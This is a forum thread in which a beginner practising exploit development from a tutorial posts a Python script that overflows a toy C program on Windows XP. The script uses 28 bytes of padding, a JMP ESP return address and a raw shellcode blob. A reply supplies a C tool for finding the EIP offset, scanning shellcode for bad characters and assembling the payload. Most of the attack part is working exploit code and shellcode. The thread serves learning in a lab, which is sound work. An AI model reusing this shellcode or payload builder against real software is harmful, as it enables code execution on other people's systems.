Hi all,

I am new to exploit development. I was practising stack-based buffer overflows by following the tutorial at:

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

I tried changing the shellcode from popping up calc.exe to something else, and I succeeded.

shellcode 1: http://www.exploit-db.com/exploits/28996/ [my best option]

shellcode 2: http://www.exploit-db.com/exploits/33836/

Then I wrote a very simple string program.

 

#include <stdio.h>
#include <conio.h>

int main()
{
    char str[10];
    printf("Enter you name:");
    scanf("%s", str);
    printf("Hello %s..", str);
    getch();
    return 0;
}

With the help of Immunity Debugger I found that after sending 28 'A's I control EIP. Then I wrote the exploit code in Python:

shellcode used: http://www.exploit-db.com/exploits/28996/

OS: XP SP2

import win32com.client, time

shell = win32com.client.Dispatch("WScript.Shell")
shell.Run("text.exe")   # text.exe is that application
time.sleep(1)           # give the window time to appear before sending keys

junk = 'A' * 28                 # 28 bytes of padding reach the saved return address
junk2 = '\xBC\xB7\xE5\x76'      # 76E5B7BC   FFE4   JMP ESP (little-endian)
shellcode = ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
             "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
             "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
             "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
             "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
             "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x69\x74"
             "\x36\x01\x68\x73\x65\x6e\x6a\x68\x20\x50\x72\x61\x89\xe1\xfe"
             "\x49\x0b\x31\xc0\x51\x50\xff\xd7")

# type the whole payload into the program's "Enter you name:" prompt
shell.SendKeys(junk + junk2 + shellcode)
shell.SendKeys("{ENTER}")
shell.SendKeys("{ENTER}")
shell.SendKeys("{ENTER}")

But the problem is that whatever shellcode I use, I always get the calculator as output. I don't understand the reason: I am not even using the calc.exe shellcode, so how does it happen repeatedly? Please help me out, guys.

Edited by prasenjit
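The three mechanical steps behind the exploit in the post above (find the EIP offset, check the shellcode for bytes the input path will mangle, assemble junk + return address + shellcode), as an added C example; this is not code from the post or from the Corelan tutorial. The offset (28), the JMP ESP address (0x76E5B7BC) and the shellcode bytes in `posted_sc` are copied from the post; everything else (`pattern_create`, `pattern_offset`, `count_bad_chars`, `build_payload`, `g_payload`) is illustrative naming. The two bad-character sets are assumptions about the two paths the post sends input through: `scanf("%s")` stops reading at the first `isspace()` byte (and a NUL would end the C string), and WScript.Shell `SendKeys` reserves `+ ^ % ~ ( ) { } [ ]` as control characters.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <ctype.h>

/* Shellcode bytes exactly as posted in the question (113 bytes). */
static const unsigned char posted_sc[] = {
    0x31,0xd2,0xb2,0x30,0x64,0x8b,0x12,0x8b,0x52,0x0c,0x8b,0x52,0x1c,0x8b,0x42,
    0x08,0x8b,0x72,0x20,0x8b,0x12,0x80,0x7e,0x0c,0x33,0x75,0xf2,0x89,0xc7,0x03,
    0x78,0x3c,0x8b,0x57,0x78,0x01,0xc2,0x8b,0x7a,0x20,0x01,0xc7,0x31,0xed,0x8b,
    0x34,0xaf,0x01,0xc6,0x45,0x81,0x3e,0x46,0x61,0x74,0x61,0x75,0xf2,0x81,0x7e,
    0x08,0x45,0x78,0x69,0x74,0x75,0xe9,0x8b,0x7a,0x24,0x01,0xc7,0x66,0x8b,0x2c,
    0x6f,0x8b,0x7a,0x1c,0x01,0xc7,0x8b,0x7c,0xaf,0xfc,0x01,0xc7,0x68,0x69,0x74,
    0x36,0x01,0x68,0x73,0x65,0x6e,0x6a,0x68,0x20,0x50,0x72,0x61,0x89,0xe1,0xfe,
    0x49,0x0b,0x31,0xc0,0x51,0x50,0xff,0xd7
};

/* Metasploit-style cyclic pattern (Aa0Aa1...Aa9Ab0...) instead of a run of 'A':
 * the bytes that land in EIP then map back to a single offset. */
size_t pattern_create(unsigned char *out, size_t len)
{
    size_t n = 0;
    for (int u = 'A'; u <= 'Z'; u++)
        for (int l = 'a'; l <= 'z'; l++)
            for (int d = '0'; d <= '9'; d++) {
                const unsigned char grp[3] = { (unsigned char)u, (unsigned char)l, (unsigned char)d };
                for (int i = 0; i < 3; i++) {
                    if (n == len) return n;
                    out[n++] = grp[i];
                }
            }
    return n;
}

/* Offset of the 4 bytes seen in EIP (read little-endian, as the debugger shows), or -1. */
long pattern_offset(uint32_t eip, size_t patlen)
{
    unsigned char pat[4096];
    const unsigned char needle[4] = { eip & 0xff, (eip >> 8) & 0xff, (eip >> 16) & 0xff, (eip >> 24) & 0xff };
    if (patlen > sizeof pat) patlen = sizeof pat;
    size_t n = pattern_create(pat, patlen);
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;
}

/* Simulate the debugger view: the 4 pattern bytes that overwrote the saved EIP at `pos`. */
long offset_from_pattern_at(size_t pos)
{
    unsigned char pat[256];
    size_t n = pattern_create(pat, sizeof pat);
    if (pos + 4 > n) return -1;
    uint32_t eip = pat[pos] | ((uint32_t)pat[pos + 1] << 8) | ((uint32_t)pat[pos + 2] << 16) | ((uint32_t)pat[pos + 3] << 24);
    return pattern_offset(eip, n);
}

typedef int (*badchar_fn)(unsigned char);

/* Sink in the post: scanf("%s") stops at the first whitespace byte; NUL ends the C string. */
int bad_for_scanf_s(unsigned char c) { return c == 0 || isspace(c) != 0; }

/* Delivery path in the post: SendKeys control characters (assumption about the tool). */
int bad_for_sendkeys(unsigned char c) { return c != 0 && strchr("+^%~(){}[]", c) != NULL; }

int count_bad_chars(const unsigned char *sc, size_t n, badchar_fn is_bad)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++) hits += is_bad(sc[i]) != 0;
    return hits;
}

long first_bad_char(const unsigned char *sc, size_t n, badchar_fn is_bad)
{
    for (size_t i = 0; i < n; i++) if (is_bad(sc[i])) return (long)i;
    return -1;
}

/* junk[offset] + ret (little-endian) + shellcode; returns total length, 0 if `cap` is too small. */
size_t build_payload(unsigned char *out, size_t cap, size_t offset, uint32_t ret,
                     const unsigned char *sc, size_t sclen)
{
    size_t total = offset + 4 + sclen;
    if (total > cap) return 0;
    memset(out, 'A', offset);                 /* padding up to the saved return address */
    out[offset + 0] = ret & 0xff;             /* 76E5B7BC is stored as BC B7 E5 76 */
    out[offset + 1] = (ret >> 8) & 0xff;
    out[offset + 2] = (ret >> 16) & 0xff;
    out[offset + 3] = (ret >> 24) & 0xff;
    memcpy(out + offset + 4, sc, sclen);      /* JMP ESP lands here */
    return total;
}

static unsigned char g_payload[512];

int main(void)
{
    printf("pattern bytes at 28 map back to offset %ld\n", offset_from_pattern_at(28));
    printf("scanf(\"%%s\") terminators in shellcode: %d, first at index %ld\n",
           count_bad_chars(posted_sc, sizeof posted_sc, bad_for_scanf_s),
           first_bad_char(posted_sc, sizeof posted_sc, bad_for_scanf_s));
    printf("SendKeys control characters in shellcode: %d, first at index %ld\n",
           count_bad_chars(posted_sc, sizeof posted_sc, bad_for_sendkeys),
           first_bad_char(posted_sc, sizeof posted_sc, bad_for_sendkeys));
    size_t len = build_payload(g_payload, sizeof g_payload, 28, 0x76E5B7BCu, posted_sc, sizeof posted_sc);
    printf("payload: %zu bytes, ret bytes %02x %02x %02x %02x\n", len,
           g_payload[28], g_payload[29], g_payload[30], g_payload[31]);
    return 0;
}
```

Run against the posted bytes, the scan flags six `isspace()` bytes (the first is the 0x0c at index 9) and two `~` (0x7e) characters, so the bad-character check is worth doing against both sinks before the offset or the return address are suspected. The cyclic pattern replaces counting 'A's: send the pattern, read EIP in Immunity, and `pattern_offset` gives the distance to the saved return address directly.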

Maybe, but stupid question. This never happens. There must be other mistakes of yours.
